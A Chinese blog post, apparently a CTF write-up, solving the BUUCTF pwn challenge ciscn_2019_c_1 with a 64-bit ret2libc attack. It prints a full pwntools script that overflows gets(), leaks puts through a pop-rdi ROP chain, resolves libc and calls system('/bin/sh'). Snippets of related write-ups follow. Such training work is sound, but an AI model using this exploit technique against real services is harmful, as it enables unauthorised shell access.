ciscn_2019_c_1【BUUCTF】

已于 2022-08-26 20:59:13 修改
阅读量1.3k 收藏 4
点赞数 1
分类专栏: CTF训练 PWN 文章标签: 安全 PWN linux
于 2022-08-26 20:08:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41696518/article/details/126544336
版权

目录

思路

在这里插入图片描述
开启了栈不可执行,因此shellcode方法失效,IDA查看漏洞
在这里插入图片描述
在encrypt函数中发现gets,因此估计是一道ret2libc的题目,由于这是64位程序,寻找pop rdi ret就行
在这里插入图片描述
发现存在pop_rdi_ret,因此思路为:

  1. 先泄露puts地址,这样可以获得相应libc
  2. 通过获得的libc得到system地址和/bin/sh地址,大功告成!

程序流程分析

执行可执行文件,先输入选择,由于漏洞在encrypt,我们选用1
在这里插入图片描述
让我们输入要加密的内容
在这里插入图片描述
输入AAAAAAAA,会自动输出加密后的内容,并且重新开始选择界面
在这里插入图片描述

解题

先获取libc

思路有两种,1.绕过程序加密步骤,利用程序输出。2.使用puts函数输出
这里我选择第二种
先动调计算gets需要填充的地址:
在这里插入图片描述
需要填充0xe10-0xdc0p = 0x50和0x08地址空间,获取libc代码:

from pwn import *
from LibcSearcher import *
io = process("./ciscn_2019_c_1")
# io = remote("node4.buuoj.cn",28315)
elf = ELF("./ciscn_2019_c_1")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi_ret = 0x400c83
encrypt_addr = elf.symbols["encrypt"]
main_addr = elf.symbols['main']

payload = b'a' * (0x50 + 0x08) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr)
io.sendlineafter("Input your choice!\n",str(1))
io.sendlineafter("Input your Plaintext to be encrypted\n",payload)
io.recvuntil("Ciphertext\n")
io.recvuntil("\n")
puts_addr = u64(io.recvline().strip().ljust(8,b'\0'))
libc = LibcSearcher("puts",puts_addr)

通过libc找到/bin/sh地址实施攻击

libcbase = puts_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
str_bin_sh = libcbase + libc.dump('str_bin_sh')
payload = b'a' * (0x50 + 0x08) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(main_addr)
io.sendlineafter("Input your Plaintext to be encrypted",payload)
io.interactive()

完整代码

from pwn import *
from LibcSearcher import *
io = process("./ciscn_2019_c_1")
# io = remote("node4.buuoj.cn",28315)
elf = ELF("./ciscn_2019_c_1")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi_ret = 0x400c83
encrypt_addr = elf.symbols["encrypt"]
main_addr = elf.symbols['main']
payload = b'a' * (0x50 + 0x08) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr)
io.sendlineafter("Input your choice!\n",str(1))
io.sendlineafter("Input your Plaintext to be encrypted\n",payload)
io.recvuntil("Ciphertext\n")
io.recvuntil("\n")
puts_addr = u64(io.recvline().strip().ljust(8,b'\0'))
libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
str_bin_sh = libcbase + libc.dump('str_bin_sh')
payload = b'a' * (0x50 + 0x08) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(main_addr)
io.sendlineafter("Input your Plaintext to be encrypted",payload)
io.interactive()
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4490
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 480
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
[BUUCTF]ciscn_2019_c_1
Lucien_Carr的博客
04-08 1589
想办法通过encrypt函数的 get函数栈溢出获得其中一个函数的地址(本题选择puts),通过LibcSearcher得到该函数在对应libc中的偏移量。没有‘system’,‘bin/sh’等有用的字符串,函数列表里也没有system等后门函数。该程序中并没有system,bin/sh等有用的字符串,无法使用ret2text。也没有构造溢出的函数,但是有很多puts,很好后面ret2libc可以用。通过已经调用过的函数泄露它在程序中的地址,然后利用地址末尾的3个字节,在。没什么能构造溢出的函数。
ciscn_2019_c_1 1(地址泄露,64位ROP,栈溢出)
最新发布
Snk0xHeart的博客
04-15 2308
执行 pop rdi,将 puts_got 地址放入 rdi 寄存器。执行 puts_plt,调用 puts 函数,puts 函数根据 rdi 寄存器中的地址,打印出 puts 函数的实际地址,实现地址泄露。执行 main,程序返回到 main 函数,等待我们进行下一次输入和攻击。在 64 位程序中,ROP 链的栈布局通常如下:栈地址 值 作用返回地址 pop_rdi 跳转到 pop rdi;ret下一个值 puts_got 被弹出到 rdi 寄存器。
BUUCTF ciscn_2019_c_1
N1rvana的博客
11-14 5006
一道积攒了很久才解出来的题,这道题大体不难,但是好多小细节呜呜呜。而且Libcsearcher里的libc库没更新(上篇博客讲了)。 这道题是BUUCTF上的ciscn_2019_c_1。标准的64位ROP流程,我也就分享一下自己的坎坷心路历程。 代码审计 老规矩checksec一下,只开了nx保护。 观察main函数 显然哦,只有输入1才有点用。 关键函数:encrypt() 发现一个栈溢出漏洞。ROP链的入口。 然后就是读取s的长度,在长度范围内对内容进行加密:也就是根据ascii码范围不同来进行
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1437
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
ciscn_2019_c_1
qq_45913417的博客
11-18 9231
经典ret2libc,着实恶心到我了。前后捣鼓了将近3、4个小时,勉强把原理理解透彻。 边做题边C语言:艹! 输入字符串s加密逻辑: 1、如果是小写字母跟0xD异或 2、如果是大写字母跟0xE异或 3、如果是数字跟0xF异或 [ASCII码对照表]:(http://c.biancheng.net/c/ascii/) LibcSearcher工具:https://github.com/dev2ero/LibcSearcher from pwn import * from LibcSearcher i
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 917
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 6030
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
[BUUCTF]-PWN:ciscn_2019_final_3解析(tcache dup)
2301_79326813的博客
02-15 512
查看保护RELRO保护为FULL,got表不可修改,只能修改hook表了查看ida这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)
BUUCTF ciscn_2019_c_1(ret2libc)
weixin_45441024的博客
01-04 499
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
BUUCTFciscn_2019_c_1
2201_75556700的博客
11-30 1262
1、kali分析文件2、运行文件:3、64位ida分析文件,在函数名那里可以看到有三个函数:main,encrypt,begin在main函数中调用了这两个函数,还调用了puts函数,puts函数是libc库中的函数encrypt函数中调用了gets危险函数;gets函数是libc库中的一个函数4、shift+f12查看字符串,这里没有调用system也没有后门,猜测是利用ret2libc。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值